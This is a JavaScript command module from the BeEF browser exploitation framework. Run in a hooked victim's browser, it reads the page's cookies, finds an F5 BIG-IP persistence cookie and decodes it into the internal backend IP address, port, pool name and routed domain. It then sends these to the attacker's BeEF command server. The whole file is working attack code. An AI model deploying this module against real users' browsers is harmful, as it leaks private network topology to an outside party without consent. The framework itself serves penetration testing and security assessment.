GitHub Repository: beefproject/beef
Path: blob/master/modules/network/ADC/f5_bigip_cookie_disclosure/command.js
//
// Copyright (c) 2006-2026 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Name and raw value of the matched cookie; both stay empty when no cookie
// in document.cookie has a value in one of the recognised formats.
var BIGipCookieName = '';
var BIGipCookieValue = '';

// Fields derived from the cookie. 'unknown' is the placeholder kept when the
// cookie name or value does not carry the corresponding piece of information.
var poolName = 'unknown';
var routedDomain = 'unknown';

// Holds the { host, port } object returned by f5CookieDecode once a cookie
// has been matched; it is an empty string until then.
var backend = '';

// Query-string style report handed to beef.net.send at the end of the module.
var result = '';
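/**
 * Decode a clear-text F5 BIG-IP persistence cookie value into the backend
 * address and port it encodes.
 *
 * Four layouts are recognised and tried in this order:
 *   1. <decimal>.<decimal>.<...>            IPv4; address and port bytes are swapped
 *   2. rd<N>o<20 zeros>ffff<8 hex>o<port>   IPv4 carrying an "rd<N>" prefix
 *   3. vi<32 hex>.<decimal>                 IPv6; port bytes are swapped
 *   4. rd<N>o<32 hex>o<port>                IPv6 carrying an "rd<N>" prefix
 *
 * Only lower-case hex digits are accepted by the patterns. A value that is
 * not in one of these clear-text layouts (for instance because the
 * persistence cookie is encrypted on the load balancer) matches nothing, and
 * both fields of the result are left undefined.
 *
 * Fixes over the previous version: the fields are taken from the regex
 * captures instead of re-splitting the whole value (an IPv4 address whose
 * hex form contains "ffff" no longer breaks layout 2, and a trailing cookie
 * delimiter no longer leaks into the port of layout 4), the IPv6 host keeps
 * its last hex digit and has no trailing ':', and parseInt always gets an
 * explicit radix.
 *
 * @param {string} cookieValue - raw cookie value
 * @returns {{host: (string|undefined), port: (string|number|undefined)}}
 *          port is a string for layouts 1, 3 and 4 and a number for layout 2,
 *          as before.
 */
function f5CookieDecode(cookieValue) {
  var host;
  var port;
  var parts;
  var raw;

  // Exchange the low and high byte of a 16-bit value.
  function swapPortBytes(value) {
    return ((value & 0xFF) << 8) | ((value >> 8) & 0xFF);
  }

  // Turn 32 hex digits into eight ':'-separated groups of four.
  function groupHex(hex) {
    var groups = [];
    for (var i = 0; i < hex.length; i += 4) {
      groups.push(hex.slice(i, i + 4));
    }
    return groups.join(':');
  }

  // Layout 1: the address is a decimal integer whose bytes are read from
  // least to most significant.
  parts = cookieValue.match(/(\d{8,10})\.(\d{1,5})\./);
  if (parts !== null) {
    raw = parseInt(parts[1], 10);
    host = [
      raw & 0xFF,
      (raw >> 8) & 0xFF,
      (raw >> 16) & 0xFF,
      (raw >> 24) & 0xFF
    ].join('.');
    port = '' + swapPortBytes(parseInt(parts[2], 10));
    return { host: host, port: port };
  }

  // Layout 2: the address is eight hex digits, one byte per pair, in order.
  parts = cookieValue.match(/rd\d+o0{20}f{4}([a-f0-9]{8})o(\d{1,5})/);
  if (parts !== null) {
    host = [
      parseInt(parts[1].slice(0, 2), 16),
      parseInt(parts[1].slice(2, 4), 16),
      parseInt(parts[1].slice(4, 6), 16),
      parseInt(parts[1].slice(6, 8), 16)
    ].join('.');
    // NOTE(review): port handling is kept exactly as it was. This branch
    // swaps the bytes of the port while layout 4 below uses the port as
    // written, and the hex form is not zero-padded, so a port with three hex
    // digits (443 -> '1bb' -> 'b1b') decodes to a wrong number. Confirm the
    // intended encoding against F5's cookie format documentation before
    // changing it.
    raw = parseInt(parts[2], 10).toString(16);
    port = parseInt(raw.slice(2, 4) + raw.slice(0, 2), 16);
    return { host: host, port: port };
  }

  // Layout 3: 32 hex digits of address, port stored with its bytes swapped.
  parts = cookieValue.match(/vi([a-f0-9]{32})\.(\d{1,5})/);
  if (parts !== null) {
    host = groupHex(parts[1]);
    port = '' + swapPortBytes(parseInt(parts[2], 10));
    return { host: host, port: port };
  }

  // Layout 4: 32 hex digits of address, port used as written.
  parts = cookieValue.match(/rd\d+o([a-f0-9]{32})o(\d{1,5})/);
  if (parts !== null) {
    host = groupHex(parts[1]);
    port = parts[2];
  }

  // Both fields are undefined when no layout matched.
  return {
    host: host,
    port: port
  };
}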
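// Look for the first cookie whose value has one of the clear-text BIG-IP
// persistence layouts. Capture 1 is the cookie name and capture 2 the value.
// The full match m[0] also contains the delimiter that follows the value
// (',', ';' or whitespace), so the captures are used instead of splitting
// m[0] on '='; previously that delimiter was carried into the value handed
// to the decoder.
var m = document.cookie.match(/([~_\.\-\w\d]+)=(((?:\d+\.){2}\d+)|(rd\d+o0{20}f{4}\w+o\d{1,5})|(vi([a-f0-9]{32})\.(\d{1,5}))|(rd\d+o([a-f0-9]{32})o(\d{1,5})))(?:$|,|;|\s)/);

if (m === null) {
  result = 'result=BigIP cookie not found';
} else {
  BIGipCookieName = m[1];
  BIGipCookieValue = m[2];
  result = 'BigIP_cookie_name=' + BIGipCookieName;

  // The default cookie name is "BIGipServer" followed by the pool name.
  // slice() keeps the whole remainder even if it repeats the prefix.
  if (BIGipCookieName.indexOf('BIGipServer') === 0) {
    poolName = BIGipCookieName.slice('BIGipServer'.length);
    result += '&pool_name=' + poolName;
  }

  // Values starting with "rd" carry a numeric identifier between "rd" and
  // the first "o"; it is reported as routed_domain.
  if (BIGipCookieValue.indexOf('rd') === 0) {
    routedDomain = BIGipCookieValue.split('rd')[1].split('o')[0];
    result += '&routed_domain=' + routedDomain;
  }

  // host and port are reported as "undefined" when the value passed the
  // broad pattern above but none of the decoder's stricter layouts.
  backend = f5CookieDecode(BIGipCookieValue);
  result += '&host=' + backend.host + '&port=' + backend.port;
}

// The two <%= ... %> placeholders are filled in by the server-side template
// before the script is delivered.
beef.net.send('<%= @command_url %>', <%= @command_id %>, result);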
});